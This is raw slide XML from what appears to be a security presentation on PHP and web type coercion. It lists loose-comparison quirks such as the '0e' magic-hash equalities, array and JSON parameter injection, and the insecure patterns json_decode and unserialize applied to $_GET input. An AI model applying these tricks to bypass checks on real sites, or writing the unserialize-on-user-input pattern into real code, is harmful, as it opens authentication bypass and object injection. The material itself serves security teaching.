          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PHP Type Coercion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Integer to Array…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="2019300"/>
            <a:ext cx="5209060" cy="6853636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="53585F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="000000"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="355600" dist="0" dir="0">
              <a:srgbClr val="000000">
                <a:alpha val="75000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="302259" indent="-302259" defTabSz="397256">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2400">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25908" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Integer to Array</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0 == [1,2,3]</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false</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0 != [1,2,3]</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="302259" indent="-302259" defTabSz="397256">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2400">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25908" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Integer to Float</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1 == 1.5</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false</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1 == 1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="302259" indent="-302259" defTabSz="397256">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2400">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25908" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Integer to String</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10 == “10”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</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2 == “two”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="604519" indent="-302259" defTabSz="397256">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25908" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>0 == “any string”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="183" name="More Integer to Strings ….…"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6802487" y="1814684"/>
            <a:ext cx="5590064" cy="7260038"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5590062" cy="7260036"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="181" name="More Integer to Strings ….…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="190500" y="190499"/>
              <a:ext cx="5209063" cy="6853637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="53585F"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="000000"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
            </a:gra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p>
              <a:pPr marL="284479" indent="-284479" algn="l" defTabSz="373886">
                <a:spcBef>
                  <a:spcPts val="2300"/>
                </a:spcBef>
                <a:buSzPct val="30000"/>
                <a:buBlip>
                  <a:blip r:embed="rId2"/>
                </a:buBlip>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="24384" dir="5400000">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica Neue"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>More Integer to Strings ….</a:t>
              </a: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2 == “2 foobar”</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> // </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="85FF6E"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>true</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:endParaRP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2 == “a2”</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> // </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FF767A"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>false</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:endParaRP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“foobar” = 0</a:t>
              </a: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“5foobar” == 5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="284479" indent="-284479" algn="l" defTabSz="373886">
                <a:spcBef>
                  <a:spcPts val="2300"/>
                </a:spcBef>
                <a:buSzPct val="30000"/>
                <a:buBlip>
                  <a:blip r:embed="rId2"/>
                </a:buBlip>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="24384" dir="5400000">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica Neue"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Exponents ….</a:t>
              </a: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“0e12” = 0^12 = </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="85FF6E"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0</a:t>
              </a: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“0e99” = “0e1” = </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="85FF6E"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:srgbClr val="85FF6E"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1" marL="568959" indent="-284479" algn="l" defTabSz="373886">
                <a:spcBef>
                  <a:spcPts val="2300"/>
                </a:spcBef>
                <a:buSzPct val="30000"/>
                <a:buBlip>
                  <a:blip r:embed="rId2"/>
                </a:buBlip>
                <a:defRPr sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFE28E"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="24384" dir="5400000">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="Andale Mono"/>
                  <a:ea typeface="Andale Mono"/>
                  <a:cs typeface="Andale Mono"/>
                  <a:sym typeface="Andale Mono"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>0e99123994571238 …</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="182" name="More Integer to Strings ….…" descr="More Integer to Strings ….…"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="5590064" cy="726003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Web Type Coercion"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="254000"/>
            <a:ext cx="11430000" cy="2069496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Web Type Coercion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="PHP, Python, Node, ASP - Support Array parameters:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="2768600"/>
            <a:ext cx="11430000" cy="2551393"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="422275" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="36195" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>PHP, Python, Node, ASP - Support </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE28E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameters</a:t>
            </a:r>
            <a:r>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFE28E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="844550" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="36195" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://www.example.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo[]</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p1</a:t>
            </a:r>
            <a:r>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo[]</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="844550" indent="-422275" defTabSz="554990">
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="36195" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://www.example.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p1</a:t>
            </a:r>
            <a:r>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Content Type JSON Parameters supports bool, int, string…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787399" y="5920140"/>
            <a:ext cx="11430003" cy="3480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15594" indent="-315594" algn="l" defTabSz="414780">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="30000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27050" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Content Type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> JSON Parameters supports bool, int, string</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="631188" indent="-315594" algn="l" defTabSz="414780">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="30000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27050" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>XML RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ruby</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on Rails, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> out of the box</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="631188" indent="-315594" algn="l" defTabSz="414780">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="30000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27050" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:t>DJango</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) - supports </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as optional parser</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="631188" indent="-315594" algn="l" defTabSz="414780">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="30000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27050" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$data</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>json_decode</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘data’]</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="631188" indent="-315594" algn="l" defTabSz="414780">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="30000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="FF767A"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27050" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
                <a:sym typeface="Lucida Grande"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$data</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘data’]</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rP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Hash Message Authentication Codes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1" sz="6400">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hash Message Authentication Codes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
